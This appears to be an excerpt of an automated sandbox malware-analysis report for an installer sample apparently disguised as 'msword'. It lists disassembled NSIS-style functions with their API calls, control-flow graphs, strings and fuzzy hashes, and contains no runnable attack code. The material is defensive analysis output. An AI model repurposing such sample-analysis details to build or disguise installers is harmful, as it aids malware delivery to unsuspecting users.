                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    • GlobalFree.KERNELBASE(008F3A70), ref: 00402387
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                    • String ID:
                                                                    • API String ID: 3376005127-0
                                                                    • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                    • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                    • String ID:
                                                                    • API String ID: 2568930968-0
                                                                    • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                    • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                    APIs
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                    • String ID: <RM>$WarsFeltMadridFarmsPee$WriteINIStr: wrote [%s] %s=%s in %s
                                                                    • API String ID: 247603264-1220653561
                                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                    Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                    • API String ID: 3156913733-2180253247
                                                                    • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                    • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                    Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                    • String ID: HideWindow
                                                                    • API String ID: 1249568736-780306582
                                                                    • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                    • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                    Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                    Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                    Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                    Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                    Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                    Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
